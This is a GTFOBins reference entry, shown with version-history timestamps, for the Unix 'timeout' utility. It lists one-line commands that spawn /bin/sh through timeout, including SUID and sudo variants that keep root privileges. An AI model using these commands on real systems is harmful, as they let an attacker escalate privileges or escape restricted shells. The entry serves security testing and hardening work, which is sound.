GTFOBins.github.io/_gtfobins/timeout.md

10 lines
186 B
Markdown
Raw Normal View History

2018-06-12 14:06:16 +00:00
---
functions:
execute-interactive:
2018-07-04 18:26:52 +00:00
- code: timeout 7d /bin/sh
2018-06-12 14:06:16 +00:00
suid-enabled:
2018-07-04 18:26:52 +00:00
- code: "./timeout 7d /bin/sh -p"
sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh
2018-06-12 14:06:16 +00:00
---